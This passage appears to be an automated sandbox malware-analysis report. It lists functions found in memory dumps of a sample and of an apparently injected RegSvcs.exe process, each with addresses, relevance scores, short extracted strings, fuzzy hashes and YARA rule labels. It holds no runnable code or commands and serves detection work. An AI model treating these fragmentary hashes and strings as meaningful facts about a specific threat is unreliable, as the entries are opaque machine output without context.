Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4c14bef2b372f6cf4ce23daa069f74bd1f36c7df5302ba3cfb05d59489dc4a
Instruction ID: ed8b5aa2f38e2df36526697eeb9e1c7b6e08b82560e11428a67e1c3125f05503
Opcode Fuzzy Hash: db4c14bef2b372f6cf4ce23daa069f74bd1f36c7df5302ba3cfb05d59489dc4a
Instruction Fuzzy Hash: 1F612574E252099FCB09CFA9C5819DEFBF2FF88210F24952AD415B7265D3709A428F64

Function 01205880 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a343a6a092e28382b78407a6edd2ef0c97b793dda871e8a0e9e8763dc050654
Instruction ID: 523e562732504cfdb5c8a6d9b66799dc7c0be94da33bece8cfaa77240afbc285
Opcode Fuzzy Hash: 5a343a6a092e28382b78407a6edd2ef0c97b793dda871e8a0e9e8763dc050654
Instruction Fuzzy Hash: 0D711570E25209DFCB09CF99C5815DEFBF2FF89210F24952AD415B7255D3709A418F64

Function 01208D58 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81686959e0498c7a252b35760f623353e4fc276d6ebebe7757d94e7544b36ae3
Instruction ID: 69f10c388a83c63ec9cb08adf5b8244969cb53a38a7e587ca7099f318aa4da88
Opcode Fuzzy Hash: 81686959e0498c7a252b35760f623353e4fc276d6ebebe7757d94e7544b36ae3
Instruction Fuzzy Hash: 20713C74E152299FCB15DFA9D980A9EFBB2BF88300F14C2A9D909A7356D7309E41CF50

Function 01205CE0 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19de29ad8ae09155c5851764e810aec2066eed6eaa7574f66c0f2a04a5e64914
Instruction ID: 288ece2f62fd87607659dd10f6b9152a3707c4d5b79f864054d6faccd7bb951f
Opcode Fuzzy Hash: 19de29ad8ae09155c5851764e810aec2066eed6eaa7574f66c0f2a04a5e64914
Instruction Fuzzy Hash: 48515671E056198BDB58CF6B8D4479EFBF3AFC9200F14C1AAD50CA6265EB305A868F11

Function 01208750 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6008af9c58dcc318a4e32cb199b091ce156a1bd98c9157fe4ff2855ba0b28444
Instruction ID: 26c9af776e2d37762e3c0fc39d3e163d2bd646e029ec700f6b730bfe83c51494
Opcode Fuzzy Hash: 6008af9c58dcc318a4e32cb199b091ce156a1bd98c9157fe4ff2855ba0b28444
Instruction Fuzzy Hash: 54511974E10219DFDB14CFA9D845B9EFBB2FB88310F14C1AAD908A7365D7309A818F50

Function 01208740 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 092cfb55d26f61bea094ca881cbf5d97674a3e5ece13b9a8f4886f6925f3bd3e
Instruction ID: 25ab5181db6eb420efd60896d040bdabfc9ea76bcf0977bab128b0eb512bbb3c
Opcode Fuzzy Hash: 092cfb55d26f61bea094ca881cbf5d97674a3e5ece13b9a8f4886f6925f3bd3e
Instruction Fuzzy Hash: A7415AB4E11218CFDB14CF69D845B9EBBF2AF88300F14C1AAD508A73A5D7309A81CF50

Function 02B1C19C Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d2fb9b9d116d9ef2e114e1f21ecefd1b6ad003556823b766b0ad743e9a860a
Instruction ID: b7165bb5f55a3cf53d7f7fe531c567909479a8613663e75ae5a354a72b351ff9
Opcode Fuzzy Hash: 50d2fb9b9d116d9ef2e114e1f21ecefd1b6ad003556823b766b0ad743e9a860a
Instruction Fuzzy Hash: 3641CAB5D05259AFCB10CFA9D984ADEFBF5BB49314F24906AE808B7210D334AA45CF94

Function 02B1C1BC Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e0ec43ffa2005fa5a79c1254135e56b5ff9642a77f895b3d7b106e8d5d1b7c8
Instruction ID: 0920f46f01621146ff552061e776edc84d7a9b0d15a89fe6c07f37b69972d064
Opcode Fuzzy Hash: 1e0ec43ffa2005fa5a79c1254135e56b5ff9642a77f895b3d7b106e8d5d1b7c8
Instruction Fuzzy Hash: 2631A9B8D01249AFCB10CFA9D984ADEFBF5EB49310F24906AE808B7310D375A945CF94

Function 02B1DC88 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2faf786bb5efe1a67b1da5b7b8b8b8f7e3d13f45ef30f987d4db7bc3d3ae4858
Instruction ID: 03be4d937cdff4862f2e20a5f5314c590cdf3af5feaa74f4dce806785139aa40
Opcode Fuzzy Hash: 2faf786bb5efe1a67b1da5b7b8b8b8f7e3d13f45ef30f987d4db7bc3d3ae4858
Instruction Fuzzy Hash: 3D3199B5D01209AFCB10CFA9D984ADEFBF5EB49314F24906AE818B7310D375AA45CF54

Function 01200878 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac38f9f4d638e124ffa06e340c4bc56f4ec00decc249ca404ad35a0356be787
Instruction ID: cb553532664bdfddb2f6e473bf0047292e96510bb4e6d96a410048046305b975
Opcode Fuzzy Hash: bac38f9f4d638e124ffa06e340c4bc56f4ec00decc249ca404ad35a0356be787
Instruction Fuzzy Hash: F2213E71E156188FEB19CFAB99506DEFBF3BFC9200F04C1BAC508A6265D73005468F51

Analysis Process: RegSvcs.exePID: 2120, Parent PID: 6784COMMON

Executed Functions

Function 017C6730 Relevance: 6.7, Strings: 5, Instructions: 468COMMON

Download Yara Rule

Strings

,hq, xrefs: 017C69F2
,hq, xrefs: 017C6A00
(odq, xrefs: 017C6988
(odq, xrefs: 017C6CA5
(odq, xrefs: 017C697A

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (odq$(odq$(odq$,hq$,hq
API String ID: 0-2216594193
Opcode ID: ab24aa2d9933562d9f74574dba5078870628d3c62ddab7577bb1adf8541b4731
Instruction ID: 993ee088e77abfbadbefd73950d939b6cdc5c143ead982245bf9af65956d710b
Opcode Fuzzy Hash: ab24aa2d9933562d9f74574dba5078870628d3c62ddab7577bb1adf8541b4731
Instruction Fuzzy Hash: 84122971A002099FDB15CFA9C984AAEFBB2FF89704F14846DF905AB3A1D730E941CB50

Function 017CC470 Relevance: 5.2, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CC6D8
PHdq, xrefs: 017CC6C7
PHdq, xrefs: 017CC3F8
PHdq, xrefs: 017CC3E7

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq$PHdq$PHdq
API String ID: 0-1492427403
Opcode ID: f9841d4e211ad425efbfb1b438534ecf479df31f50ff0329b58d2361670d9705
Instruction ID: 294a135c47e050ba9984e126cb04ecb4dbcec6fac058d6612e8970194066623a
Opcode Fuzzy Hash: f9841d4e211ad425efbfb1b438534ecf479df31f50ff0329b58d2361670d9705
Instruction Fuzzy Hash: 03A1B274E002188FDB15DFA9D984AADFBF2BF89700F14916DE819AB265DB309981CF50

Function 017C9858 Relevance: 3.4, Strings: 2, Instructions: 859COMMON

Download Yara Rule

Strings

4'dq, xrefs: 017CA273
(odq, xrefs: 017C9C78

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (odq$4'dq
API String ID: 0-972384718
Opcode ID: 9d1b5fa492a4e8a9ac4b6766e89bd05c90eb804c96433d7d50c8b20e5e1672c0
Instruction ID: 7daa240d4882793d449518e438a2d2c77a7280bc15880673a10cd417226540c9
Opcode Fuzzy Hash: 9d1b5fa492a4e8a9ac4b6766e89bd05c90eb804c96433d7d50c8b20e5e1672c0
Instruction Fuzzy Hash: AC725F71A00209DFCB15CFA8C984AAEFBF2FF88755F15855DE9059B2A1E730E981CB50

Function 017C6108 Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

(odq, xrefs: 017C6642
Hhq, xrefs: 017C650E

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (odq$Hhq
API String ID: 0-1720555311
Opcode ID: 397b1fafc6d429df85e8797753be74f69a8dab46b58333ffa097f56ed28b9b8d
Instruction ID: 6fc507e3c35a544b4f388a019f22fdd57c517344e6d3e996f65c6e3ce4b2acd9
Opcode Fuzzy Hash: 397b1fafc6d429df85e8797753be74f69a8dab46b58333ffa097f56ed28b9b8d
Instruction Fuzzy Hash: 38127E70A002199FDB15DFA9C994AAEBBF6BF88700F14856DE909DB391DF309D41CB90

Function 017C3573 Relevance: 2.9, Strings: 2, Instructions: 430COMMON

Download Yara Rule

Strings

$dq, xrefs: 017C3596
Xhq, xrefs: 017C35AF

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Xhq$$dq
API String ID: 0-4001282582
Opcode ID: 29af5e8a13e44a75fc0d86f2163b158bd30b7442baaaec5dc58a04bd95ef134b
Instruction ID: bdf98181bb1bdb4a8a9db0596f70fd158d3ef137bbb3ac5be00d1707988bf6f1
Opcode Fuzzy Hash: 29af5e8a13e44a75fc0d86f2163b158bd30b7442baaaec5dc58a04bd95ef134b
Instruction Fuzzy Hash: 63F15C74E002499FCB58DFB9D8545AEBBF2BF89710B14956DE806EB358CF349802CB51

Function 017CB4A0 Relevance: 2.7, Strings: 2, Instructions: 227COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CB758
PHdq, xrefs: 017CB747

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: 4c01568877d3b7c9e1a1becbd0905a990ad19bdebb8a0578fff39474ce12c782
Instruction ID: 8e1a0ac94067e58b116e0890d187047b199cb63700b379e94931d351712a11a9
Opcode Fuzzy Hash: 4c01568877d3b7c9e1a1becbd0905a990ad19bdebb8a0578fff39474ce12c782
Instruction Fuzzy Hash: 5DA1D574E002188FDB14DFA9D995A9DFBF2BF89740F14906DE809AB361DB309981CF50

Function 017CBEB0 Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CC107
PHdq, xrefs: 017CC118

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: e0985400c8543ff34afd2e85929134462a0d883a7f00f51b775b4cf33b520eec
Instruction ID: 43e70c0013221c2b616b53a61ae6c9343332e4c2174ab6968ad8825ee39c5745
Opcode Fuzzy Hash: e0985400c8543ff34afd2e85929134462a0d883a7f00f51b775b4cf33b520eec
Instruction Fuzzy Hash: CE81B174E002088FDB19DFAAD984A9DFBF2BF89300F149069E819AB355DB319981CF50

Function 017CC753 Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CC9B8
PHdq, xrefs: 017CC9A7

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: 3acac8c342be102c2b39bf12f3e7cb133c0000158dc867c8760bf561a0d5bc25
Instruction ID: 9f48bca47aa4bb6e0bab24479dc49196301ba89c2f1016a7eac442a293e0f662
Opcode Fuzzy Hash: 3acac8c342be102c2b39bf12f3e7cb133c0000158dc867c8760bf561a0d5bc25
Instruction Fuzzy Hash: DB81B474E002188FDB19DFA9D994A9DFBF2BF89710F149069E809AB365DB349981CF10

Function 017CC190 Relevance: 2.7, Strings: 2, Instructions: 190COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CC3E7
PHdq, xrefs: 017CC3F8

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: 96afbb88a8cd45147921fde9f99838136d6a0bc67f4f752fa10f36485f0364ee
Instruction ID: 8a9edce17ff6e9fd0a3f711121b651583c160dd08cf3f0fe55271989e880fbc4
Opcode Fuzzy Hash: 96afbb88a8cd45147921fde9f99838136d6a0bc67f4f752fa10f36485f0364ee
Instruction Fuzzy Hash: 3E81B274E002088FDB55DFAAD994A9DFBF2BF89300F14D069E819AB365DB309981CF11

Function 017CB483 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CB758
PHdq, xrefs: 017CB747

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: 29d67154d553688db5d1fb4707b67dd0d5ce51161a10ce48cc78b0746a93ada6
Instruction ID: 6af13ea02000141fbc295a6edf3dbbf8250f9a2af1a5e7d087ae967323a8e2a0
Opcode Fuzzy Hash: 29d67154d553688db5d1fb4707b67dd0d5ce51161a10ce48cc78b0746a93ada6
Instruction Fuzzy Hash: 3771D875E002089FDB14CFAAD985A9EFBF2BF89700F14906DE909AB365DB319941CF50

Function 017C4AD9 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017C4D41
PHdq, xrefs: 017C4D30

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: b02e0c2f2115b0957fe92091fe977349e67c6834a9572ea45ea3fd3ee9fecbc7
Instruction ID: 10e44dd818dff042e7f12fa20a252e79cc54499399dd96e3df45ec81071dc3bd
Opcode Fuzzy Hash: b02e0c2f2115b0957fe92091fe977349e67c6834a9572ea45ea3fd3ee9fecbc7
Instruction Fuzzy Hash: 7081A274E00218CFDB58DFA9D994A9DFBF2BF89300F149069E819AB365DB349981CF10

Function 017CCA33 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CCC87
PHdq, xrefs: 017CCC98

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: 5196ac3596defc94b1bdc774f323a50eb2d91b9f5827bc9b14821f55ab200b13
Instruction ID: 81f12f9d00b341a9248ed1767c795fddca4e67e55094b990dc1601643e511c39
Opcode Fuzzy Hash: 5196ac3596defc94b1bdc774f323a50eb2d91b9f5827bc9b14821f55ab200b13
Instruction Fuzzy Hash: 3081A274E002188FDB15DFAAD994A9DFBF2BF89300F14D069E819AB365DB309981DF10

Function 017CBBD3 Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CBE27
PHdq, xrefs: 017CBE38

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: f3a47679b6715fe92f1e572786cae4623c0e87ceb7d00e396aa5c9e29d0797e5
Instruction ID: b649e4b5116ee7e6259ac951f49439f7af501b4e4953cec89fc9d7c1d8594797
Opcode Fuzzy Hash: f3a47679b6715fe92f1e572786cae4623c0e87ceb7d00e396aa5c9e29d0797e5
Instruction Fuzzy Hash: 05819374E00218CFDB18DFAAD984A9DFBF2BF89700F149069E809AB355DB309981CF51

Function 017CB4F3 Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

PHdq, xrefs: 017CB758
PHdq, xrefs: 017CB747

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: b895115aa72ef651aeab2e9f89da0c48b5b72c3dbe40de52fb8309a6f6547c16
Instruction ID: a6da21db3ae077d1924ae57bd91291ea61d175500a64d790977ada1788e6fdff
Opcode Fuzzy Hash: b895115aa72ef651aeab2e9f89da0c48b5b72c3dbe40de52fb8309a6f6547c16
Instruction Fuzzy Hash: 4061A374E006089FDB18DFAAD984A9EFBF2BF89700F14D069E819AB365DB345941CF50

Function 017C6E58 Relevance: 10.5, Strings: 8, Instructions: 497COMMON

Download Yara Rule

Strings

,hq, xrefs: 017C7308
(odq, xrefs: 017C6F51
,hq, xrefs: 017C72F8
(odq, xrefs: 017C7377
(odq, xrefs: 017C6F7D
(odq, xrefs: 017C701A
(odq, xrefs: 017C6E96
(odq, xrefs: 017C7367

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (odq$(odq$(odq$(odq$(odq$(odq$,hq$,hq
API String ID: 0-1376594924
Opcode ID: 60842717df27f43e3310f8bf3dfce5932b79a106d209eeb1f709920eeff4ef5e
Instruction ID: d77e071ce28afa61b057fdb35cdfa913ff699a914836f8234b328a6c672978fc
Opcode Fuzzy Hash: 60842717df27f43e3310f8bf3dfce5932b79a106d209eeb1f709920eeff4ef5e
Instruction Fuzzy Hash: 1C223771A002498FCB19DF69C984A9EBBF2BF88714F15859DE9099B3A1DB30ED41CF50

Function 017C87E9 Relevance: 4.3, Strings: 3, Instructions: 507COMMON

Download Yara Rule

Strings

;dq, xrefs: 017C8C2C
4'dq, xrefs: 017C8837
4'dq, xrefs: 017C8811

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$;dq
API String ID: 0-3371634610
Opcode ID: 65697f7ea8361775dba7ab4e20d0c0bb52703bb45652721a2ace38c0144f9416
Instruction ID: 1358c7f1002f5587c148eaa33be7685e957071f5ffe77f1f9c699ae613f95804
Opcode Fuzzy Hash: 65697f7ea8361775dba7ab4e20d0c0bb52703bb45652721a2ace38c0144f9416
Instruction Fuzzy Hash: 20F184713145018FEB159A2DC954B7DBA96AF85F00F1944AEE606CF3A2EE25CC81C753

Function 017C77F0 Relevance: 3.2, Strings: 2, Instructions: 701COMMON

Download Yara Rule

Strings

$dq, xrefs: 017C8314
$dq, xrefs: 017C8337

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: f6dafae9e46050c9e79f28ef915e240bc57545bc739347f5458b3e96d9c625b4
Instruction ID: 9e319013bb460509fd8128d86d5659daad367b56961d0684b7c5b0ef2759e720
Opcode Fuzzy Hash: f6dafae9e46050c9e79f28ef915e240bc57545bc739347f5458b3e96d9c625b4
Instruction Fuzzy Hash: E1521C74A006198FEB549BE4C8A0BAEBB73FB84340F1081ADC51A6B394DF359D85DF52

Function 017C56A8 Relevance: 2.8, Strings: 2, Instructions: 322COMMON

Download Yara Rule

Strings

Hhq, xrefs: 017C5793
Hhq, xrefs: 017C57C6

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Hhq$Hhq
API String ID: 0-2450388649
Opcode ID: 97dad78bf3e81505ec116fdc608203e3f15a1965e8f21104c3dc7f26557f20bd
Instruction ID: 36d8e29c8892c9f27e505f90a91b6fd51f570e007e61467abbe19efd89186772
Opcode Fuzzy Hash: 97dad78bf3e81505ec116fdc608203e3f15a1965e8f21104c3dc7f26557f20bd
Instruction Fuzzy Hash: 6AB1DF717042199FDB169F78C894B2EBBE2AB88B10F14456DE906CB391DF76EC41C790

Function 017C5C08 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

,hq, xrefs: 017C5CDE
,hq, xrefs: 017C5CE8

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ,hq$,hq
API String ID: 0-3475114797
Opcode ID: fc2d3fc9cfae35de9eb30cdd5d310194a9ae40c2f6a46981bb772f385119325d
Instruction ID: a097154d6fa433def3d57b1df4e55651fab8f4356a9d836c3ad300289b990817
Opcode Fuzzy Hash: fc2d3fc9cfae35de9eb30cdd5d310194a9ae40c2f6a46981bb772f385119325d
Instruction Fuzzy Hash: BD816D35B006069FCB14CF6DC88896AFBB2BF89B10B1481ADD5159B361DB32F841CF91

Function 017C3428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xhq, xrefs: 017C3435
Xhq, xrefs: 017C345E

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Xhq$Xhq
API String ID: 0-635196136
Opcode ID: 651b17af586dc578ddca73dbd4736efdc6e03630671139dbf22f66d2ba682757
Instruction ID: eef092b281c98b09e019663a7ab62df176a8c16f0c58dc88e98d83bd2c0dc27a
Opcode Fuzzy Hash: 651b17af586dc578ddca73dbd4736efdc6e03630671139dbf22f66d2ba682757
Instruction Fuzzy Hash: DB31B775B003294BEF1D59BD999427EE9A6BBC4B11F14803ED916C7380DF74CD418761

Function 017C0C8F Relevance: 1.6, Strings: 1, Instructions: 400COMMON

Download Yara Rule

Strings

LRdq, xrefs: 017C0E5E

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LRdq
API String ID: 0-3106745678
Opcode ID: 21e8ca8dbe2b7bc688d9874152a65fa1f4c2a84d201687cc4b9c069b3fce2c8e
Instruction ID: a32ffd9602c63d9d907b757711adcd70b67675ecb22e878d9f19c2c44fc7a625
Opcode Fuzzy Hash: 21e8ca8dbe2b7bc688d9874152a65fa1f4c2a84d201687cc4b9c069b3fce2c8e
Instruction Fuzzy Hash: DC22E674A00219CFCB64DF65ED99A8DBBB2FF48301F1096A9E80AA7354DB346D85CF41

Function 017C0CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LRdq, xrefs: 017C0E5E

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LRdq
API String ID: 0-3106745678
Opcode ID: 60e43f1d36b137185d81c79322faaca469d1919cf0a669a986c504dd55a219c8
Instruction ID: 43f5864e303d11f88b83bc2e45e1b7d9436dc49d2a7d4ef3f9610c273895b2f7
Opcode Fuzzy Hash: 60e43f1d36b137185d81c79322faaca469d1919cf0a669a986c504dd55a219c8
Instruction Fuzzy Hash: 6122E674A00219CFCB64DF65ED99A8DBBB2FF48301F1096A9E80AA7314DB346D85CF41

Function 017CA650 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

(odq, xrefs: 017CA7D9

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (odq
API String ID: 0-567950297
Opcode ID: b563326ce4188472ad22346609a4db6d65a16617615b799fd3225a6b4bbea35e
Instruction ID: 114b426c5fdf39741005e0180bb8253695693176505feb0eeda9609f44b097d4
Opcode Fuzzy Hash: b563326ce4188472ad22346609a4db6d65a16617615b799fd3225a6b4bbea35e
Instruction Fuzzy Hash: 7C41AF367002089FCB199BB8D9556AEBFB6BBC8711F14446DEA16E7391DE318C01CB90

Function 017CA818 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
